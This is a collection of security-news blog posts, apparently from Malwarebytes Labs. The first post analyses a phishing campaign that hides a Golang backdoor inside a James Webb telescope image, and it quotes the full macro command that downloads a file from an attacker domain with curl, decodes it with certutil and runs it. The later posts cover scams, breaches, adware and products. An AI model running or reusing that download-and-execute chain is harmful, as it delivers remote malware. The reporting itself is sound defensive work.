IT NEWS

James Webb telescope images used to hide malware

A rather unique approach to spread malware using the popularity of the James Webb telescope images has been identified by the Securonix threat research team.

The malware is being spread by a phishing campaign that includes a Microsoft Office attachment. Similar to traditional Office macros, the template file contains a Visual Basic script that will initiate the first stage of code execution for this attack once the user enables macros. Through several steps the actual payload turns out to be a Golang binary file that acts as a backdoor.

Golang

Golang or GO, which is the actual name of Golang, is an open source programming language. Some threat actors have started writing malicious code using cross-platform programming languages like Golang, Python, and Rust, with the aim of penetrating and encrypting as many systems as possible. This allows their malware to run on different combinations of operating systems and architectures.

VBA Macro

In this campaign, when the document is opened, a malicious template file is downloaded and saved on the system. The template includes the functions Auto_Open, AutoOpen, and AutoExec. The malicious VBA macro code is set to be auto executed once macros are enabled.

VBA macros should be disabled unless there are compelling reasons not to. As we explained when Microsoft disabled macros for five Office apps, the Mark of the Web (MOTW) can be circumvented by malware authors.

Certificate

The obfuscated code in the macro executes the following command:

cmd.exe  /c cd c:users{username}appdatalocal & curl http://www.xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

This command will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary called msdllupdate.exe and then finally, execute that binary.

But, if you open the .jpg with any of the programs that are normally associated with JPG files, you will see this image:

oxb36f8geec634.jpg

But, remember when we talked about steganography? Images can be used to hide information, or an executable in this case.

Obfuscation

The image contains malicious Base64 code disguised as an included certificate. Base64 is an encoding scheme designed to carry data stored in binary formats across channels that only reliably support text content. Base64 is particularly prevalent on the World Wide Web where one of its uses is the ability to embed image files or other binary assets inside textual assets such as HTML and CSS files.

In the command we saw how the legitimate certutil was used to decode the so-called certificate and create a binary called msdllupdate.exe.

Payload

The malware payload copies itself into %localappdata%microsoftvault and creates and executes a batch file in the same folder called update.bat. The .bat file creates the directory %LOCALAPPDATA%microsoftwindowsMsSafety and adds another copy of msdllupdate.exe to that folder. For this file, a startup entry is created in the registry to achieve persistence.

The malware connects to a C2 server and goes into an infinite loop waiting for commands from the C2. Three commands are supported:

  • sleep to change timeout between C2 requests
  • timeout to change timeout parameter in nslookup request
  • all other commands will be executed with “cmd.exe /c

Basically this allows the threat actor to execute arbitrary code on the affected machine.

Mitigation

Malwarebytes customers were protected right from the start since Malwarebytes detected the Msdllupdate.exe file without requiring any updates. Our detection engine identified it as malicious by using our generic criteria for suspicious files.

Malwarebytes blocks Generic.Malware

The Malwarebytes web protection engine will also block traffic to the C2 servers involved in this campaign and the domains hosting malware files.

Stay safe, everyone!

Malwarebytes receives highest rankings in recent third-party tests

Malwarebytes Endpoint Protection continues to receive outstanding results in third-party testing. Our recent participation in two highly-regarded industry evaluations, namely MRG-Effitas and Info-Tech’s Data Quadrant Report, reflects our belief that continual testing and unbiased validation are crucial to our mission to deliver easy, effective, and efficient cyber protection for customers. 

Info-Tech’s Data Quadrant report: Malwarebytes ranks #2 overall and #1 across several key areas

Using data collected from real end users, Info-Tech’s Data Quadrant Reports provide a holistic, unbiased view of the product landscape to help you determine which product is right for your organization. Malwarebytes ranked #2 out of 14 organizations in the report, earning a composite satisfaction score of 8.8.

easset upload file32149 234658 e
easset upload file39497 234658 e

Malwarebytes also took the #1 spot for three different categories: 

  1. Usability And Intuitiveness (Shallow end user learning curve): 87% user satisfaction 

  2. Vendor Support (Offers quality support): 84% user satisfaction 

  3. Flexible Deployment Options (Supports on-premise, cloud and hybrid IT environments): 87% satisfaction

MRG Effitas 360° Assessment & Certification: Badges across the board

MRG Effitas, a world leader in independent IT research, published its antivirus efficacy assessment results in August 2022. We achieved the highest possible score (100%) for a fourth consecutive quarter and received certifications for Level 1 (the highest ranking awarded by MRG Effitas), Exploit, Online Banking, and Ransomware.

Tested and published in a separate report, our mobile product also achieved the MRG Android 360 degree certification. 

easset upload file50028 234658 e

Malwarebytes Endpoint Protection blocked a wide range of ransomware, fileless attacks and other threats:

  • 100 percent of “in the wild” threats blocked: Tested malware considered as ‘zero-day’, delivered by URLs 

  • 100 percent of ransomware blocked: Tested ‘in-house’ ransomware samples in-house (no possibly known signatures or community verdicts)

  • 100 percent of financial malware blocked: Tested financial malware used in the Magecart credit card-skimming attack

  • 100 percent of fileless attacks blocked: Tested to see how security products protect against a specific exploitation technique

  • 100 percent of PUA/adware blocked: Tested potentially unwanted applications (PUA), that are not malicious, but are generally considered unsuitable for most home or business networks.

Malwarebytes Endpoint Protection also delivered the fourth best performance rating of all tested vendors, and did it with zero false positives, providing further evidence that the Malwarebytes EP delivers the right combination of powerful detection without affecting overall operating system performance.

Easy, effective, and efficient cyber protection validated by third-party testing

Malwarebytes is committed to regularly subjecting our solutions to third-party testing.

Third-party testing is critical to ensuring that your endpoint security solution performs well where it counts, whether that’s ease-of-use, rate of false positives, percentage of threats blocked, and so on. To read more about what customers have to say about Malwarebytes Endpoint Protection and EDR, check out our case studies page.

More resources

Why MRG-Effitas matters to SMBs

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Why MITRE matters to SMBs

British Airways customers targeted in lost luggage Twitter scam

Getting back into the travel habit? Jumping on a plane soon? Experienced a bit of a luggage disaster and looking for help on social media? Watch out, because a lack of prior research could prove very costly.

Word has spread of a bogus Twitter account pretending to be a customer support channel of British Airways. Now suspended, the fraud operation seems to have taken a fair bit of cash before being shut down. 

Lose your luggage, find a fraud

People posting about missing luggage on Twitter quickly found their replies filling up with offers to help from a non-verified account purporting to be British Airways. The account asked for phone numbers and likely pushed for additional contact via Twitter’s private message system.

Unfortunately, these offers of help quickly turned sour. The scam account requested various forms of payment to help recover the missing luggage. Although the fakers have been suspended, a lot of replies sent their way still exist. Looking through, we can see at least one individual who was initially told that her luggage was “lost in Dallas”. To move things along, a request for payment was made using the payment system Wise.

Though initially a small amount overall, the scammers quickly ramped things up. It’s not long before the victim complained that they were being asked for even more money. Eventually, they claim to have lost out on no less than a thousand US dollars. Of course, they still don’t have any idea where their luggage has ended up. Taking these amounts from people who are overseas, with no belongings, and a now potentially cleaned out bank account is quite the vicious approach.

Avoiding the luggage assistance fakers

Here are some things you should do, and be aware of, when in transit.

  • Airlines are not going to ask for additional fees or payment to help you look for your bags.
  • Be wary of non-verified accounts replying to you. Is it asking for additional personal details? Phone numbers? Payment? Why?
  • Go directly to the source. Use official websites, verified support channels, phone numbers listed on those official websites. You can pretend to be anyone you like on social media, and this is a ripe field for potentially costly scams.
  • If you’re still not sure of the authenticity of an account you’re dealing with, go to the airport help desk. If you’ve realised your bags are missing, you’re almost certainly still in the terminal. Make full use of their availability and ensure everything and everyone you’re interacting with is the real deal.

As people slowly start to get back into the swing of travel, it’s inevitable that fraudsters will do as much as they can to rip those travellers off in any way they can. Customer support is great, but it pays to be mindful when ringing the help alarm. You never quite know who’s going to show up in response.

Chromium browsers can write to the system clipboard without your permission

If you are a user of Google Chrome or any other Chromium-based web browser, then websites may push anything they want to the operating system’s clipboard without your permission or any user interaction. This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge.

Clipboard

In layman’s terms, the clipboard is where the data lives while you copy and paste, or cut and paste for that matter. Copying and pasting is such an essential part of our daily computing that most of us just do it automatically. And it can lead to undesirable results if something outside of our control decides to interfere. For example, if you used the “cut” action on a certain piece of text with the intention to paste it somewhere else, it can be a nasty surprise if something completely different gets pasted, and due to using the cut rather than copy, you may have lost the original.

Gestures

Firefox and Safari do require a user gesture before websites can copy content to the device’s clipboard. User gesture in this context means that the user is selecting content on the site and using Ctrl+C or other means to copy it to the clipboard. Chrome and other Chromium-based browsers currently have no such restriction.

Demonstration

If you’d like to see this demonstrated or if you want to check if you are somehow protected against this happening, you can visit the Webplatform News website to test your browser. All it takes is to visit the site and check the content of the clipboard afterwards. You can check the content by “pasting” to an empty text editor like Notepad. Should you get the following message in your clipboard, the browser is vulnerable to unauthorized clipboard manipulation:

“Hello, this message is in your clipboard because you visited the website Web Platform News in a browser that allows websites to write to the clipboard without the user’s permission. Sorry for the inconvenience. For more information about this issue, see https://github.com/w3c/clipboard-apis/issues/182.”

Windows clipboard manager

For Windows 10 and 11 users there is a way to retrieve overwritten items from your clipboard. These Windows versions come with a clipboard manager, although it does need to be turned on first. This can be done in the Settings menu on your computer. Under System, you’ll find a section called Clipboard. Toggle the switch to On behind Clipboard history. Windows will now start keeping track of your clipboard content. To review the history up to 25 items you can use the Win+V keys.

Not new

At Malwarebytes Labs we wrote about clipboard poisoning attacks on the Mac back in 2016. The take-away from that article in the current context is that by pasting in a sensitive place, like the Terminal on a Mac, or a Command Prompt on a Windows machine, text can become a command that gets executed.

Broken

In his article about the clipboard issue, developer Jeff Johnson states that the user gesture requirement for writing to the clipboard was accidentally broken in version 104. And although the vulnerability has been flagged, fixing it may be delayed because it breaks other functionality. Apparently, adding user gesture requirement for readText and writeText APIs breaks NTP doodle sharing. NTP Google doodles are animations that appear in some cases in Chrome when a new tab is opened. Personally, I wouldn’t miss them at all.

Mitigation

While we wait for a fix, threat actors may come up with ways to abuse this temporary vulnerability. Here are some things you can do to stay on the safe side:

  • Do not open webpages between any cut/copy and paste actions.
  • Check the content of your clipboard before you past into any sensitive areas. You can use any clipboard manager or just paste into a text field to see what is momentarily there. For those of you doing financial transactions this is always worth considering, since there is malware out there that can change bitcoin addresses and bank account numbers on your clipboard.

Stay safe, everyone!

A week in security (August 22 – August 28)

Last week on Malwarebytes Labs:

Stay safe!

Twilio data breach turns out to be more elaborate than suspected

Earlier this month, messaging service Twilio got compromised by a sophisticated social engineering attack. After deploying phishing attacks against company employees, hackers were able to access user data, but now it seems that the impact of the hack was more elaborate than originally assumed.

In a first update, Twilio, a cloud-based communication platform provider, revealed that the attackers also compromised the accounts of some users of Authy, its two-factor authentication (2FA) app. Outisde of Twilio, the identity authentication company Okta revealed that the data of some Okta customers was accessible to a threat actor, as well. And Signal tweeted that they, too, had been affected by the Twilio breach.

Authy

Authy is a two-factor authentication (2FA) service from Twilio that allows users to secure their online accounts by double-checking the login attempt via a dedicated app, after typing in the login credentials.

By gaining access to 2FA data, the malicious actors gained access to the accounts of 93 individual Authy users and registered additional devices to their accounts. Twilio says that it has now removed such devices from accounts.

Okta

Okta has determined that a small number of mobile phone numbers and associated SMS messages containing one-time passwords (OTPs) were accessible to the threat actor via the Twilio console. A one-time password is an automatically generated numeric or alphanumeric string of characters that authenticates a user for a single transaction or login session. OTPs typically expire after a short period (up to one minute).

Okta offers customers a range of authenticators to choose from, including the use of SMS for the delivery of one-time codes. Twilio provides one of two services Okta leverages for customers that choose to use SMS as an authentication factor.

Signal

Signal is an end-to-end encrypted messaging service, similar to WhatsApp or iMessage, but owned and operated by a non-profit foundation. Twilio provides Signal with phone number verification services. As a result of the attack on Twilio, Signal warned that for 1,900 users, an attacker could have attempted to re-register their number to another device or learned that their number was registered to Signal. These 1,900 users were notified directly, and prompted to re-register.

Signal tweet

Signal’s tweet about the Twilio breach

Scatter Swine

The Twilio data breach appears to be part of a larger campaign from hackers that targeted at least 130 organizations, among them MailChimp, Klaviyo, and Cloudflare.

In this campaign, spanning recent months, a number of technology companies were subject to persistent phishing attacks by a threat actor that you will see referred to as Scatter Swine or Oktapus. This threat actor is known to repeatedly target the same organizations with multiple phishing attacks within a matter of hours.

In the Twilio case, the threat actor searched for 38 unique phone numbers in the Twilio console, nearly all of which can be linked to a single targeted organization. A review of logs provided by Twilio revealed that the threat actor was seeking to expand their access. It is likely that the threat actor used credentials previously stolen in phishing campaigns to trigger SMS-based MFA challenges, and used access to Twilio systems to search for OTPs sent in those challenges.

Mitigation

If you are a user of any of the services mentioned above, you should have been notified if your account was affected, but it doesn’t hurt to check the advice and details about the attack on their respective sites.

One general piece of advice is to be extra vigilant about “new device added” notifications from any provider. This could be a warning signal that a threat actor is trying to intercept 2FA messages or OTPs that are intended for you.

Playing Doom on a John Deere tractor with Sick Codes: Lock and Code S03E18

In 1993, the video game developers at id Software released Doom, a first-person shooter that placed a nameless protagonist into the fiery depths of hell, equipped with an arsenal of weapons to mow down imps, demons, lost souls, and the intimidating “Barons of Hell.” 

In 2022, the hacker Sick Codes installed a modified version of Doom on the smart control panel of a John Deere tractor, with the video game’s nameless protagonist this time mowing down something entirely more apt for the situation: Corn.

At DEFCON 30, Sick Codes presented his work to an audience of onlookers at the conference’s main stage. His efforts to run the modified version of Doom, which are discussed in today’s episode of Lock and Code with host David Ruiz, are not just good for a laugh, though. For one specific community, the work represents a possible, important step forward in their own fight—the fight for the “right to repair.” 

“Right to Repair” enthusiasts want to be able to easily repair the things they own. It sounds like a simple ask, but when’s the last time you repaired your own iPhone? When’s the last time you were even able to replace the battery yourself on your smartphone?

The right to repair your equipment, without intervention from an authorized dealer, is hugely important to some farmers. If their tractor breaks down because of a software issue, they don’t want to wait around for someone to have to physically visit their site to fix it. They want to be able to fix it then and there and get on with their work.

So, when a hacker shows off that he was able to do something that wasn’t thought possible on a device that can be notoriously difficult to self-repair, it garners attention.  

Today, we speak with Sick Codes about his most recent work on a John Deere tractor, and how his work represents a follow-up to what he a group of researchers showed last year, when he revealed how he was able to glean an enormous amount of information about John Deere smart tractor owners from John Deere’s data operations center. This time around, as Sick Codes explained, the work was less about tinkering around on a laptop and more about getting phsyical with a few control panels that he found online. 

“It’s kind of like surgery but for metallic objects, if that makes sense. Non-organic material.”

Tune in today to listen to Sick Codes discuss his work, why he did what he did, and how John Deere has reacted to his research. 

You can also find us on Apple PodcastsSpotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Source code of password manager LastPass stolen by attacker

In a security incident notice from LastPass the company informed the public know that an unauthorized party gained access to portions of the LastPass development environment through a single compromised developer account. There is no evidence that this incident involved any access to customer data or encrypted password vaults.

LastPass

LastPass offers a password manager which is reportedly used by more than 33 million people and 100,000 businesses around the world. A password manager is a software application designed to store and manage online credentials. It also generates strong passwords. Usually, these passwords are stored in an encrypted database and locked behind a master password.

Stolen passwords

Because of the nature of their business, a breach notification naturally worries people that the passwords they stored in their password manager may have been leaked or compromised. And indeed here was some speculation on social media that hackers may be able to access the keys to password vaults after stealing source code and proprietary information.

Since your individual passwords are encrypted and locked behind a master password that even LastPass does not know, this worry seems unjustified. In December of 2021, LastPass users reported that their master passwords were compromised after receiving email warnings that someone tried to use them to log into their accounts from unknown locations and devices. LastPass determined that these were the result of a credential stuffing attack. Credential stuffing is a special type of brute force attack where the attacker uses existing username and password combinations, usually ones that were stolen in a data breach on another service.

Random generated passwords

Depending on the source code that was stolen there could be reason to worry about random generated passwords. Since computer systems are unable to come up with truly random numbers, having access to the source code might make it possible to predict the “random” generated passwords.

While that may seen far-fetched, a determined attacker with enough background knowledge about the circumstances under which the password was generated, for example length of the password, date of creation, username and/or email address, which elements are allowed and required, etc., might be able to brute force the password with a lot less guesses, if they know how the randomization part of the password creation is coded in the software.

What to do?

In response to the incident, LastPass deployed containment and mitigation measures, and engaged a leading cybersecurity and forensics firm. While the investigation is ongoing, they have achieved a state of containment, implemented additional enhanced security measures, and see no further evidence of unauthorized activity. 

If you haven’t done so already it is advisable to enable multi-factor authentication (MFA) on your LastPass accounts so that threat actors won’t be able to access your account even if your password is compromised. The instructions to enable MFA can be found on the LastPass Support pages.

We will keep you posted here if there are any updates to the story.

Adware found on Google Play — PDF Reader servicing up full screen ads

A PDF reader found on Google Play with over one million downloads is aggressively displaying full screen ads, even when the app is not in use. More specifically, the reader is known as PDF reader – documents viewer, package name com.document.pdf.viewer. As a result, this aggressive behavior lands it in the realm of adware. Or as we call it, Android/Adware.HiddenAds.PPMA.

Catching the adware

Catching this adware in real time is a game of install and wait. It takes a couple of hours before the PDF app will display ads. This long delay is in order to make it harder to track down which app is causing the ads. For example, full screen ads displaying immediately after install would likely result in quick a uninstall. With this in mind, I plugged my test phone into my laptop with Android Device Monitor running. Among other tools, Android Device Monitor includes LogCat which logs all activity on an Android mobile device. I then installed PDF reader – documents viewer, package name com.document.pdf.viewer, directly from Google Play. Thus, my waiting game begins the morning of August 22nd.

To my surprise, at 15:04 I heard my test phone sound a charm. My expectation from previous testing is that it takes longer before an ad displays. Before unlocking the screen, I checked my LogCat logs.

08-22 15:04:55.348: I/ActivityManager(765): START u0 {flg=0x14c00004 cmp=com.document.pdf.viewer/.ads.PPMActivity} from uid 10277

The keyword is ‘START’ in the log. What starts is an Ad SDK. This time, from the PDF reader’s special in-house Ad SDK, com.document.pdf.viewer.ads.PPMActivity.  Unlocking the lock screen, another important log comes in.

08-22 15:04:56.318: I/ActivityManager(765): Displayed com.document.pdf.viewer/.ads.PPMActivity: +942ms

Indeed, looking at the phone there is a full screen ad “displayed.”

easset upload file23856 234585 e

Soon after, another Ad SDK starts in the logs.

08-22 15:05:34.227: I/ActivityManager(765): START u0 {flg=0x10000000 cmp=com.document.pdf.viewer/com.facebook.ads.AudienceNetworkActivity (has extras)} from uid 10277

Once again, another ad displays. This time it is a video ad.

08-22 15:05:34.927: I/ActivityManager(765): Displayed com.document.pdf.viewer/com.facebook.ads.AudienceNetworkActivity: +555ms

easset upload file95514 234585 e

After the initial ads, they come more frequently. Each time, the start of ads is signified by a charm sounding on the mobile device.  Henceforth, a full screen ad is waiting. Immediately after the first ad is a video ad.

Don’t blame the Ad SDKs

PDF reader uses an array of common Ad SDKs and its own Ad SDK. Facebook Ads is shown in the log above, but we also observed it using Applovin along with others. In addition, it uses an in-house Ad SDK contained in com.document.pdf.viewer.ads.PPMActivity. Although the use of these common Ad SDKs is shown displaying ads, it is not necessarily their fault. The issue is displaying ads where they ought not to be displayed. Any of these ads within the app, whiling using the app, is fair game. Moreover, Ad SDK’s like Applovin and Facebook Ads are necessary to keep apps free on the Play Store. It is only when the ads start displaying outside the app at random that this qualifies as adware. It is the PDF reader app that is wrongfully using these Ad SDKs.

Not all PDF readers are the same

There are many good PDF readers on Google Play. However, this one has some oddities signaling red flags right from the Google Play Store description.

easset upload file39681 234585 e

Note the Mature 17+ content rating. For what reason does a PDF reader need a mature rating? Another clue something is not right is the developer’s name of Fairy games. I get diversifying the kinds of apps you provide, but odd developer name for anything other than gaming apps.

Am I infected?

If you are thinking to yourself, “I have a PDF reader installed, am I infected!?” here are a few things to check. Are you receiving full screen ads? If yes, do you have an icon that looks like this?

easset upload file96843 234585 e

If you do, you can uninstall from Apps info.

easset upload file1764 234585 e

More easily, you can install Malwarebytes for Android and use our free scanner to remove.

Another one slips through

From what we can tell from previous versions of PDF reader – documents viewer, it has existed since November 2021. Each version thereafter serves ads just like the most recent Google Play version. Although we cannot verify if it existed on Google Play since 2021, it is likely the case. If you have a lot of apps installed on your mobile device, this one can very hard to track down. Another reason to not blindly trust you are safe while installing exclusively from Google Play. Even if the Play Store is by far the safest place to install apps on Android, it can fault from time to time as well. Having an anti-malware scanner, or anti-adware in this case, is a good idea. Stay safe out there! 

App Information

Package name: com.document.pdf.viewer

App Name: PDF reader – documents viewer

Developer: Fairy games

MD5: CDA77D85D5B733C89F53254F11F3F372

Google Play URL: https://play.google.com/store/apps/details?id=com.document.pdf.viewer

Introducing Patch Management for OneView

We’re thrilled to announce our Patch Management module for OneView, which is paired alongside our Vulnerability Assessment module to help you uncover vulnerabilities, respond to threats, and keep your customers productive and safe.

Vulnerability identification and system patching are critical to strengthening security postures, but they can become a monumental task that many organizations aren’t equipped to tackle. Despite the known risks of malware and ransomware infections, the average time to patch is 102 days and almost 75% of small and large businesses say they lack the resources to patch vulnerabilities quickly enough.

As an MSP, it is important you have tools to streamline an effective, intuitive approach to vulnerability visibility and patch management for your customers. Check out our blog post “6 reasons MSPs need a patch management platform” for more benefits of a VPM platform for MSPs.

Malwarebytes Vulnerability Assessment and Patch Management modules extend OneView functionality to provide your organization deep visibility into the security vulnerabilities in your customers’ digital ecosystems. In this post, we give you a walkthrough of how to use Patch Management for OneView. For our previous post on using Vulnerability Assessment for OneView, click here.

Using the Patch Management module 

Click on “Patch Management“.

easset upload file99149 234569 e Here you can find more information on the updates available for your site’s endpoints and install these updates. Choose between tabs for operating system patches and third-party software application updates.  easset upload file36480 234569 e Click on a particular patch to learn more.

easset upload file1465 234569 eBelow you will see a list of all endpoints with this vulnerability. Select the endpoints and click “Apply patches“. easset upload file83911 234569 e

easset upload file18771 234569 e

easset upload file40161 234569 e

Check the status of these updates on the “Tasks” page.

easset upload file67671 234569 e

Quickly uncover and respond to vulnerabilities with VPM for OneView

Vulnerability and Patch Management will scan for updates across your endpoints and hand you the keys so you can lock the doors quickly and easily. To recap, this module provides the following features:

  • Scan for vulnerabilities across installed endpoint software.
  • Patch outdated applications, operating systems, or software vulnerabilities across your endpoints.
  • View detailed information on vulnerabilities across sites and endpoints.
  • View detailed information on available software and OS patches across sites and endpoints.
  • View recommended updates to perform on detected vulnerabilities.
  • Send automatic email notifications to administrators on detected vulnerabilities, available patches, and installed patches.
  • View summarized vulnerability and patching information across endpoints from your OneView dashboard.

If you have any questions, please visit service.malwarebytes.com.

Check out our MSP’s Guide to selling security!